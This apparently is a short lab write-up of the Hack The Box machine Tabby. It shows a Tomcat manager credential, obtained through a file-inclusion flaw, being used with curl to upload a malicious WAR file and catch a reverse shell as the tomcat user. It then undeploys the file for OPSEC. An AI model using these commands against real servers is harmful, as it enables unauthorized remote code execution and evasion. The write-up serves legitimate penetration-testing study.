InfoSec LAB

Tabby_Exploitation

Created: 2 min read

Malicious WAR Deployment

A manager credential of the Tomcat instance has been compromised via the LFI vulnerability present in the file parameter of the /news.php file in the web application on the target port 80

compromising a manager credential provides an opportunity to get command execution via malicious war deployment

referring to the official documentation of Tomcat 9, WAR file can be deployed remotely via a HTTP request

Deployment

┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ curl --upload-file shell.war 'http://tomcat:$3cureP4s5w0rd123!@megahosting.htb:8080/manager/text/deploy?path=/shell'
OK - Deployed application at context path [/shell]

Deploying the WAR payload via curl The payload is available at the /shell endpoint for activation

┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ curl -s -I http://megahosting.htb:8080/shell                                                                        
HTTP/1.1 200 
Content-Length: 0
Date: Sat, 23 Sep 2023 11:00:56 GMT

Activating the payload

┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.194] 49908
whoami
tomcat
hostname
tabby
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.194  netmask 255.255.255.0  broadcast 10.10.10.255
        ether 00:50:56:b9:7b:bb  txqueuelen 1000  (Ethernet)
        RX packets 2492789  bytes 399900483 (399.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2543603  bytes 1289861911 (1.2 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 18436  bytes 1439809 (1.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 18436  bytes 1439809 (1.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the tomcat user via malicious WAR deployment

Undeployment

┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ curl 'http://tomcat:$3cureP4s5w0rd123!@megahosting.htb:8080/manager/text/undeploy?path=/shell'                      
OK - Undeployed application at context path [/shell]

Undeploying the WAR payload for OPSEC

Interactive Graph View

Backlinks